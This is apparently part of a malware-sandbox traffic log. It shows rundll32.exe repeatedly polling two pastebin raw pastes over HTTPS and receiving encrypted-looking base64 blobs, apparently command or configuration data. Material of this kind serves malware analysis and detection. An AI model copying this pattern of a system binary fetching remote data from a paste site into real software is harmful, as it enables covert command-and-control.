2024-10-03 01:34:59 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:59 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 20 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931636a2c8cee-EWR
2024-10-03 01:34:59 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49751	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:59 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:59 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:59 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 20 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931681c988cb9-EWR
2024-10-03 01:34:59 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	49752	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:00 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:00 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:00 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 21 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9316caf8c7280-EWR
2024-10-03 01:35:00 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:35:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	49753	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:01 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:01 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:01 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 22 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931713cbc18f2-EWR
2024-10-03 01:35:01 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:35:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	49755	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:02 UTC	158	OUT	GET /raw/hQqNRrQt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:02 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:02 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 19 Last-Modified: Thu, 03 Oct 2024 01:34:43 GMT Server: cloudflare CF-RAY: 8cc931785cd24283-EWR
2024-10-03 01:35:02 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 56 69 37 48 74 63 4f 73 51 61 45 65 61 34 2f 38 51 49 49 33 65 48 4a 55 2f 55 65 41 41 6a 67 31 68 32 58 36 57 55 4e 31 6e 62 44 4d 54 63 6d 4b 64 75 46 71 42 33 73 2f 43 67 36 32 6e 78 4d 79 61 32 66 42 6e 4c 67 42 47 69 58 37 37 79 6f 4f 4a 6d 4c 47 74 51 3d 3d 5e 5e 5e 47 35 68 4e 61 55 51 52 4a 30 31 64 4b 38 62 62 77 76 73 59 57 67 3d 3d 5e 5e 5e 30 35 2d 2d 31 32 2d 30 35 5e 5e 5e 51 53 49 73 6e 66 72 37 67 52 6b 4c 48 42 5a 34 42 4c 45 30 72 51 3d 3d 5e 5e 5e 36 76 34 6c 68 6e 6f 36 47 4c 36 56 52 35 4c 69 59 31 50 52 61 52 6b 52 64 2b 4e 32 31 4f 34 38 49 2f 33 4a 61 2b 74 30 69 56 6a 36 4c 47 4f 56 37 61 46 56 70 76 57 72 6f 4e 71 33 71 55 63 4c 65 46 2f 4a 6d 50 65 35 74 35 63 4b 78 7a 58 2b 70 76 37 76 6b 67 3d 3d 5e 5e Data Ascii: 116^^^Vi7HtcOsQaEea4/8QII3eHJU/UeAAjg1h2X6WUN1nbDMTcmKduFqB3s/Cg62nxMya2fBnLgBGiX77yoOJmLGtQ==^^^G5hNaUQRJ01dK8bbwvsYWg==^^^05--12-05^^^QSIsnfr7gRkLHBZ4BLE0rQ==^^^6v4lhno6GL6VR5LiY1PRaRkRd+N21O48I/3Ja+t0iVj6LGOV7aFVpvWroNq3qUcLeF/JmPe5t5cKxzX+pv7vkg==^^
2024-10-03 01:35:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	49756	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:03 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:03 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:03 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 24 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9317cdf994237-EWR
2024-10-03 01:35:03 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:35:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	49757	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:03 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:03 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:03 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 24 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931816f284245-EWR
2024-10-03 01:35:03 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:35:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	49758	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:04 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:04 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:04 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 25 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931864df04262-EWR
2024-10-03 01:35:04 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:35:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	49759	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:05 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:05 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:05 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 26 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9318acd338cb9-EWR
2024-10-03 01:35:05 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:35:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	49761	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:06 UTC	158	OUT	GET /raw/hQqNRrQt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:06 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:06 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 23 Last-Modified: Thu, 03 Oct 2024 01:34:43 GMT Server: cloudflare CF-RAY: 8cc93190afed424a-EWR
2024-10-03 01:35:06 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 56 69 37 48 74 63 4f 73 51 61 45 65 61 34 2f 38 51 49 49 33 65 48 4a 55 2f 55 65 41 41 6a 67 31 68 32 58 36 57 55 4e 31 6e 62 44 4d 54 63 6d 4b 64 75 46 71 42 33 73 2f 43 67 36 32 6e 78 4d 79 61 32 66 42 6e 4c 67 42 47 69 58 37 37 79 6f 4f 4a 6d 4c 47 74 51 3d 3d 5e 5e 5e 47 35 68 4e 61 55 51 52 4a 30 31 64 4b 38 62 62 77 76 73 59 57 67 3d 3d 5e 5e 5e 30 35 2d 2d 31 32 2d 30 35 5e 5e 5e 51 53 49 73 6e 66 72 37 67 52 6b 4c 48 42 5a 34 42 4c 45 30 72 51 3d 3d 5e 5e 5e 36 76 34 6c 68 6e 6f 36 47 4c 36 56 52 35 4c 69 59 31 50 52 61 52 6b 52 64 2b 4e 32 31 4f 34 38 49 2f 33 4a 61 2b 74 30 69 56 6a 36 4c 47 4f 56 37 61 46 56 70 76 57 72 6f 4e 71 33 71 55 63 4c 65 46 2f 4a 6d 50 65 35 74 35 63 4b 78 7a 58 2b 70 76 37 76 6b 67 3d 3d 5e 5e Data Ascii: 116^^^Vi7HtcOsQaEea4/8QII3eHJU/UeAAjg1h2X6WUN1nbDMTcmKduFqB3s/Cg62nxMya2fBnLgBGiX77yoOJmLGtQ==^^^G5hNaUQRJ01dK8bbwvsYWg==^^^05--12-05^^^QSIsnfr7gRkLHBZ4BLE0rQ==^^^6v4lhno6GL6VR5LiY1PRaRkRd+N21O48I/3Ja+t0iVj6LGOV7aFVpvWroNq3qUcLeF/JmPe5t5cKxzX+pv7vkg==^^
2024-10-03 01:35:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	49762	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:07 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:35:08 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:35:07 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 28 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9319ab899c360-EWR
2024-10-03 01:35:08 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:35:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	49763	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:35:08 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
